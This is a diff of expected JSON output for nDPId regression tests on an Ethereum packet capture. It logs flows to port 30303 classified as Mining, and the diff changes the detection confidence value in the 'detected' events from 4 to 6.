+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365223,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGtlnAqAG4VdZsNN1Odl+\/h8Kjb6ZlboAQECy6hQAAAQEICiLYls1ls11Z"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1071,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365189,"flow_last_seen":1578508365225,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":127,"midstream":0,"thread_ts_msec":1578508365225,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365226,"flow_last_seen":1578508365226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365226,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1578508365226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365226,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGQk7AqAG4ikurvt1Rdl8erUWUAAAAALAC\/\/\/M9wAAAgQFtAEDAwUBAQgKItiW0AAAAAAEAgAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365239,"flow_last_seen":1578508365239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365239,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -245,50 +245,50 @@ 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1578508365315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365315,"pkt":"KDc3AG3IEBMx8Tl2CABFAACcmwpAACMRP2wS26efwKgBuHZfdl8AiLphceZOwZGufNXFAvXWI774ooc6PkwC6kxvzCm0BhiTs\/TWig3gE4P3+Y0lY\/Fll4rTUKnacLSuqKdSUAk7eTbz218E2dS8j3sLMJigll9ziTSt7jKgE6R7GxELpoJhO+ReAQHdBMuEEtunn4J2X4J2X8mETxbOvYLp94CEXhYgYQo="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1578508365408,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1578508365408,"pkt":"KDc3AG3IEBMx8Tl2CABFAACdhY9AAC4RWjq3gfKkwKgBuAQAdl8AiS5Y3VkKujBE9K5giYMoNotbt65xxd7ko3VSXKgTCSaupxKnp71rmT0XRsX6xoF5macEurqmdfib0\/9m0ybRIVy\/Qzz+\/\/zwyKtEHKyC9Xjjwvc8TLpzNetXjDWFS0pbC\/Z0AQHeBcuErBRsfYJ2X4J2X8uETxbOvYLp94J2X4ReFiBh"} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1315,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365408,"flow_last_seen":1578508365408,"flow_idle_time":200000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1578508365408,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00642{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1316,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1578508365409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACy8oAAAEARGzTAqAG4t4HypHZfBAAAnqbvG70JBv5PXjvCBbR1Rp7tYoTQJi2jMUD7JOn6eWv9REwRmFSXtYoHsvszWP\/amLZkv0asbrMZoJOaxU2yggG3KzVpk0IKmRZiX\/KGqSOqaOPD2NnZ\/WIPpNjQN9gDidCOAQLzy4S3gfKkggQAgnZfoN1ZCrowRPSuYImDKDaLW7euccXe5KN1UlyoEwkmrqcShF4WIGEF"} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1317,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1578508365409,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365409,"pkt":"EBMx8Tl2KDc3AG3ICABFAACc4fIAAEARK9jAqAG4t4HypHZfBAAAiACVOpGBWjTeJor2OHTFdIkJfHanNwusT7Z+X6ZhMccUpEYH1blVudB+7Lhiy59WZ4RAivu0dgr\/6z5c18c2wNa0j2NMO4UV7uXk8QqS8l0iv7COflKJEb7GBR6jLr1IE7ZSAQHdBMuEfwAAAYJ2X4J2X8mEt4HypIIEAICEXhYgYQU="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1318,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1578508365411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365411,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGPK8zoRcMwKgBuHZf3VQuhVQAV1cO0KAScSARYwAAAgQFrAQCCAo+6INOItiW9wEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1319,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1578508365411,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365411,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLbfAqAG4M6EXDN1Udl9XVw7QLoVUAYAQECygnAAAAQEICiLYl3Y+6INO"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1320,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365271,"flow_last_seen":1578508365413,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":573,"flow_tot_l4_payload_len":573,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1578508365413,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.161.23.12","src_port":56660,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1321,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1578508365419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365419,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADAGUh6d5phXwKgBuHZf3VIVkuQhTk9as6AScSDAlwAAAgQFrAQCCAq827CpItiW2wEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1322,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1578508365419,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365419,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQibAqAG4neaYV91Sdl9OT1qzFZLkIoAQECxPsAAAAQEICiLYl3u827Cp"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1323,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365239,"flow_last_seen":1578508365420,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508365420,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1578508365458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365458,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwG2AY0CYBEwKgBuHZf3VXR7JfX7e3rXKASaN9TlwAAAgQFrAQCCAqDIEEYItiW\/gEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1578508365458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365458,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGxBbAqAG4NAmARN1Vdl\/t7etc0eyX2IAQECzabQAAAQEICiLYl5+DIEEY"} -00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1341,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365279,"flow_last_seen":1578508365460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":472,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365460,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.9.128.68","src_port":56661,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1578508365461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365461,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcQtMAAEARjkPAqAG4ynAcanZfdl8AiDkPCEixaJX\/9thQC0r9cGcsCeen+iETb10JXBU9BZQL28M1nK8vCE6bMd2SC2XGliMqSbi8oqYHUjyrBa753h2KySNTFNso18+nMzMVWvdibnHX4lluxe+\/vRPiYB2kYX3uAAHdBMuEfwAAAYJ2X4J2X8mEynAcaoJ2X4CEXhYgYQU="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1342,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365461,"flow_last_seen":1578508365461,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365461,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1343,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1578508365465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365465,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACsGNXy2oqE9wKgBuHZf3Ueh\/8nUB338R6ASOJDbwAAAAgQFrAQCCAo8EmDbItiWYAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1344,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1578508365465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365465,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGIITAqAG4tqKhPd1Hdl8HffxHof\/J1YAQECwxpAAAAQEICiLYl6U8EmDb"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1345,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365094,"flow_last_seen":1578508365466,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":522,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1578508365466,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1578508365485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365485,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC0GVVKKS6u+wKgBuHZf3VEGdfqIHq1FlaAS\/og\/VgAAAgQFrAQCCAqkAfsSItiW0AEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1347,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1578508365485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365485,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGQlrAqAG4ikurvt1Rdl8erUWVBnX6iYAQECxbjgAAAQEICiLYl7mkAfsS"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1348,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365226,"flow_last_seen":1578508365487,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1578508365487,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365567,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 